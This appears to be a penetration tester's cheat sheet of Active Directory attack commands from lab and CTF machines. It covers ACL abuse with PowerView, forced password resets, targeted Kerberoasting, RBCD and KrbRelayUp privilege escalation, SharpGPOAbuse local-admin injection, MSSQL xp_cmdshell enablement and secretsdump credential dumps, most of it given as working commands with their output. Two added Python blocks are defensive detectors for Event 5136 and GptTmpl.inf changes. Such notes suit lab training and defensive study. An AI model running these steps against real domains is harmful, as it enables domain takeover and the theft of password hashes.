#update time
ntpdate IP_DC
rdate -n IP_DC
ntpdate -v pool.ntp.org
NetBIOS - 139/445
query the NetBIOS name service for valid names
sudo nbtscan -r 192.168.50.0/24
Doing NBT name scan for addresses from 192.168.50.0/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.50.124 SAMBA <server> SAMBA 00:00:00:00:00:00
192.168.50.134 SAMBAWEB <server> SAMBAWEB 00:00:00:00:00:00
...
By default, typical RID cycle attacks go up to RID 4000. For a larger domain, it may be necessary to expand that, so I’ll switch to lookupsid.py (though netexec works as well by adding the max number to the option like --rid-brute 10000)
smbpasswd -r 10.10.88.63 -U "Caroline.Robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
This means that mayrosec/Sales has GenericAll over the Engineering users
#converting user to SID
$sid=Convert-NameToSid "Hacker_user"
=> this user is supposed to have a misconfigured GPO and we want to determine which ACLs he holds on GPO objects
#enumerate GPO user
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
=> use BloodHound to determine which objects this GPO is linked to
ForceChangePassword
powerview
#login as user support
powerview blackfield.local/support:'passwordHere'@10.10.10.192 --dc-ip 10.10.10.192 -d --use-ldap
#changing password of user AUDIT2020
(LDAP)-[DC01.BLACKFIELD.local]-[BLACKFIELD\support]
PV > Set-DomainUserPassword -Identity AUDIT2020 -AccountPassword "passwordHere"
#abuse WriteOwner
Set-DomainObjectOwner -TargetIdentity claire -PrincipalIdentity tom
#add ResetPassword acl for claire user
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
#change claire user password
Set-DomainUserPassword -Identity claire -AccountPassword "1ts-mag1c!!"
WriteDacl
powerview
abusing WriteDacl to add users to a group
#abuse WriteDacl by granting user claire the WriteMembers ACE on the group
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights WriteMembers -PrincipalIdentity claire
#add user tom to the BACKUP_ADMINS group
Add-DomainGroupMember -Identity 'BACKUP_ADMINS' -Members 'tom'
#check if tom user was added
Get-DomainGroupMember -Identity 'BACKUP_ADMINS'
abusing WriteDacl to change password
#abuse WriteDacl by granting user claire full (All) permissions on the object
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights All -PrincipalIdentity claire
#changing password
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' 'resourced.local/Arrack$:Password123'
#export the Administrator ticket
export KRB5CCNAME=./Administrator.ccache
#authenticate with that ticket
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.167.175
#dumping ntds
impacket-secretsdump -k -no-pass resourcedc.resourced.local -dc-ip 192.168.231.175
AllowedToActOnBehalfOfOtherIdentity
This privilege essentially allows us to act on behalf of the domain controller and request service tickets on behalf of that domain computer. In particular, it lets us exploit RBCD (resource-based constrained delegation), which can allow us to compromise the domain controller. We’ve done this exploit in the past on other machines, and it seems as though this is the same type of attack path here.
check the MAQ (MachineAccountQuota) value to see whether we can create a machine account in the domain
crackmapexec ldap 10.10.103.169 -u crose -p 'Password123@' -M maq
SMB 10.10.103.169 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP 10.10.103.169 389 DC [+] phantom.vl\crose:Password123@
MAQ 10.10.103.169 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.103.169 389 DC MachineAccountQuota: 0
RBCD Through SPN-less User
At a low level, if we are able to obtain the ticket session key and change our controlled user's password hash to match that key, we can use User-to-User (U2U) authentication to trick the DC into delegating a service ticket to us. We can combine U2U and S4U2Proxy to obtain this ticket, and then use it to dump the LSA secrets of the domain controller. This works because of how the KDC interprets ticket session keys that are passed in as NT hashes for a user, allowing the user to be treated as a computer object in a sense.
So to start, we’ll get the current TGT of the user in order to discover the ticket session key.
impacket-getTGT -hashes :$(pypykatz crypto nt 'Password123@') phantom.vl/crose
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in crose.ccache
Now let’s change the user’s password once more to match the hash of the ticket session key that we just received.
impacket-smbpasswd -newhashes :4abd87ab347a96df9a497689a79bfd5c phantom.vl/crose:'Password123@'@dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
[*] NTLM hashes were changed successfully.
Now that the NTLM hash was set with the same value of our ticket session key, we should be able to use RBCD as intended.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.103.169 -action 'write' 'phantom.vl'/'crose' -hashes :4abd87ab347a96df9a497689a79bfd5c
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126)
Now that the account is able to delegate on behalf of the DC, we can request a service ticket as we normally would with our controlled user. The only difference here is that we’ll use the -u2u option so that the KDC interprets our login attempt as a domain user authentication attempt. We’ll also impersonate the Administrator account so that we can dump the secrets of the domain controller.
export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
impacket-secretsdump -k dc.phantom.vl
......
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[...snip...]:::
Recycle Bin Group Abuse
#filter only deleted objects using the isDeleted property
Get-ADObject -ldapfilter "(&(isDeleted=TRUE))" -IncludeDeletedObjects
#the filter can be narrowed to user accounts only with the objectClass property
Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects
#target a specific account to display all of its properties
Get-ADObject -ldapfilter "(&(objectclass=user)(DisplayName=TempAdmin) (isDeleted=TRUE))" -IncludeDeletedObjects -Properties *
#retrieve all deleted objects (groups, users, ...) except the Deleted Objects container itself
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
#restore a deleted object; a new CN is created but the sAMAccountName stays the same
restore-adobject -identity <ObjectGUID> -newname liza.deleted
GenericWrite
#authenticate
python3 /opt/powerview.py/powerview.py MEGACORP/sbauer:'D3veL0pM3nT!'@10.10.10.179 --dc-ip 10.10.10.179 -d --use-ldap
#set an SPN on target user "jorden" so we can request a service ticket for him and crack it (targeted Kerberoasting)
Set-DomainObject -Identity "JORDEN" -Set "serviceprincipalname=http/BLAHBLAH"
#request the service ticket for user "jorden" and print the crackable hash
python3 targetedKerberoast.py -v -d 'MEGACORP.LOCAL' -u 'sbauer' -p 'D3veL0pM3nT!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (jorden)
[+] Printing hash for (jorden)
Without protocol transition, the service can only access resources on the delegated server as the original user, which means we wouldn’t be able to abuse this just by requesting a ticket with Impacket's getST.
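From the defender's side, every abuse in the WriteOwner/WriteDacl, RBCD and GenericWrite sections above lands as an attribute write on a directory object, which Event ID 5136 (Directory Service Changes, needs the audit policy and a SACL on the objects) records. The triage below is an added example, not part of the original notes; the event records are constructed to mirror the page's own scenarios, and the field names follow the 5136 schema, with `%%14674` being the "Value Added" operation type.

```python
"""Triage Event ID 5136 records for the attribute writes that ACL abuse produces."""

# ldapDisplayName (lower-cased for matching) -> what a write to it usually means
SENSITIVE_ATTRIBUTES = {
    "msds-allowedtoactonbehalfofotheridentity": "RBCD configured (impacket-rbcd / KrbRelayUp)",
    "serviceprincipalname": "SPN set on a user, possible targeted Kerberoasting",
    "ntsecuritydescriptor": "DACL/owner changed, possible WriteDacl/WriteOwner abuse",
    "member": "group membership changed",
}
VALUE_ADDED = "%%14674"  # 5136 OperationType: Value Added (%%14675 is Value Deleted)

# Constructed sample events, shaped like a SIEM export of Security log 5136 records
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "crose",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=phantom,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "sbauer",
     "ObjectDN": "CN=jorden,CN=Users,DC=megacorp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=bob,CN=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},  # benign field
    {"EventID": 4624, "SubjectUserName": "crose"},  # not a 5136, ignored
]


def triage_5136(events, allowed_actors=frozenset()):
    """Return findings for sensitive attribute writes by actors not on the allow list.

    RBCD writes on a domain controller's computer object are rated critical: that is the
    exact change impacket-rbcd and KrbRelayUp make before dumping the DC's secrets.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        attr = ev.get("AttributeLDAPDisplayName", "")
        reason = SENSITIVE_ATTRIBUTES.get(attr.lower())
        actor = ev.get("SubjectUserName", "")
        if reason is None or actor in allowed_actors:
            continue
        severity = "high"
        if (attr.lower() == "msds-allowedtoactonbehalfofotheridentity"
                and ev.get("ObjectClass") == "computer"
                and "OU=Domain Controllers" in ev.get("ObjectDN", "")):
            severity = "critical"
        findings.append({"actor": actor, "object": ev["ObjectDN"], "attribute": attr,
                         "added": ev.get("OperationType") == VALUE_ADDED,
                         "severity": severity, "reason": reason})
    return findings
```

Feed it the real export and keep `allowed_actors` to the service accounts that legitimately manage delegation and SPNs; everything else is an investigation.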
Abusing GPOs
Suppose we have WriteDacl on the Default Domain Policy GPO
using SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "DEFAULT DOMAIN POLICY"
[+] Domain = secura.yzx
[+] Domain Controller = dc01.secura.yzx
[+] Distinguished Name = CN=Policies,CN=System,DC=secura,DC=yzx
[+] SID Value of charlotte = S-1-5-21-3453094141-4163309614-2941200192-1104
[+] GUID of "DEFAULT DOMAIN POLICY" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
#to force the GPO update on the target
gpupdate /force
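The SharpGPOAbuse run above shows where the change is written: the Restricted Groups section of the policy's `GptTmpl.inf` under SYSVOL. Auditing that file for members pushed into BUILTIN\Administrators (S-1-5-32-544) is a cheap detective control. This parser is an added example, not code from the page or from SharpGPOAbuse; the sample `.inf` text is constructed, using the SID the page shows for charlotte, and `audit_gpttmpl_file` assumes the on-disk UTF-16 encoding Windows uses for these files.

```python
"""Audit a GPO's GptTmpl.inf [Group Membership] section for local admin additions."""
import configparser

LOCAL_ADMINS_SID = "S-1-5-32-544"  # BUILTIN\Administrators

# Constructed sample: the Restricted Groups section after a principal was added
# to the local Administrators group via a GPO (the --AddLocalAdmin effect).
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-3453094141-4163309614-2941200192-1104
"""


def restricted_group_members(inf_text):
    """Return {group_sid_or_name: [members]} from the [Group Membership] section."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep the leading '*' and SID case intact
    cp.read_string(inf_text)
    groups = {}
    if not cp.has_section("Group Membership"):
        return groups
    for key, value in cp.items("Group Membership"):
        if not key.endswith("__Members"):  # skip the __Memberof entries
            continue
        group = key[: -len("__Members")].lstrip("*")
        # members are comma separated; SIDs carry a '*' prefix, plain names do not
        groups[group] = [m.strip().lstrip("*") for m in value.split(",") if m.strip()]
    return groups


def flag_local_admin_additions(inf_text, expected=frozenset()):
    """Members the GPO forces into local Administrators that are not on the expected list."""
    members = restricted_group_members(inf_text).get(LOCAL_ADMINS_SID, [])
    return [m for m in members if m not in expected]


def audit_gpttmpl_file(path, expected=frozenset()):
    """Read a real GptTmpl.inf (UTF-16 with BOM on disk) and run the same check."""
    with open(path, encoding="utf-16") as fh:
        return flag_local_admin_additions(fh.read(), expected)
```

Run it against `\\<domain>\SysVol\<domain>\Policies\<GUID>\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf` for each policy, and pair it with a watch on the GPO `versionNumber` attribute, which the tool bumps on every modification.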
To get code execution from an NTLM relay attack, the user whose authentication we relay must be a local admin on the target machine; if not, we cannot execute commands and only get a semi-interactive SMB shell, as in the example below.
However, we get an RPC access denied error and code execution does not succeed. This is because the svc_web_staging user isn’t a local administrator on the target host. Although direct code execution isn’t successful, we can still try accessing the SMB shares on the dc01 host in the context of the svc_web_staging user.
Furthermore, LDAP does not have signing enforced. This cements the fact that a Kerberos relay attack is possible through KrbRelayUp.
nxc ldap 10.10.73.8 -u 'svc_scan' -p '[...snip...]' -M ldap-checker
SMB 10.10.73.8 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.73.8 389 BRUNODC [+] bruno.vl\svc_scan:[...snip...]
LDAP-CHE... 10.10.73.8 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.73.8 389 BRUNODC LDAPS Channel Binding is set to "NEVER"
A Kerberos relay attack is essentially an authentication attack, much like NTLM relay, that allows us to relay a domain object's Kerberos authentication to another service. This essentially allows us to relay an AS-REQ to any SPN that we need to authenticate to. Where LDAP signing comes into the picture is that it will encrypt all traffic over LDAP, meaning we won’t be able to properly sniff the traffic for authentication tokens as a MITM.
So once we have the KrbRelayUp binary compiled, we’ll execute it on the target machine using the CLSID that we have selected.
PS C:\temp> .\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName daz$ -ComputerPassword Password123@ --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "daz$" added with password "Password123@"
[+] Looking for available ports..
[+] Port 2869 available
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn daz$ -cp Password123@
We’ll then execute the command provided so that a TGT request can be sent to the KDC. This allows us to use getST after this command to retrieve a TGS on behalf of the Administrator account to CIFS using our fake machine account.
export KRB5CCNAME=Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
impacket-secretsdump -k brunodc.bruno.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf58ac639976f0c99c2dde0d24ef3219d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
......
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735[...snip...]bfd4:::
#enumerate all object class on AD
python3 windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
#retrieve a list of users
python3 windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U > users
#check password stored in descriptions or other fields
windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full
#list logins we are allowed to impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
linked database:
select srvname from master..sysservers
srvname
--------------------------------------------------------------------------------
FALCONSQL
WANDASQL
#check if we are sysadmin on the linked server
select * from openquery("WANDASQL", 'SELECT is_srvrolemember(''sysadmin'')')
--------------------------------------------------------------------
0
list directories
xp_dirtree \
xp_dirtree \inetpub\wwwroot
Commands
#display version
SELECT @@version;
#display databases
SELECT name FROM sys.databases;
#display tables
SELECT * FROM offsec.information_schema.tables;
## Manual Code Execution
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
Creating a TGT to impersonate administrator
So there are a few things that we’ll need to perform this, notably:
We can then use to obtain the ticket session key based on the service ticket for this user.
generating the NTLM hash from the password with this online tool
In particular, the CLSID I picked was d99e6e73-fc88-11d0-b498-00a0c90312f3. We’ll need to compile in order to exploit this on the target machine. Luckily enough, Defender is not enabled on this box so we shouldn’t have to bypass AV for this.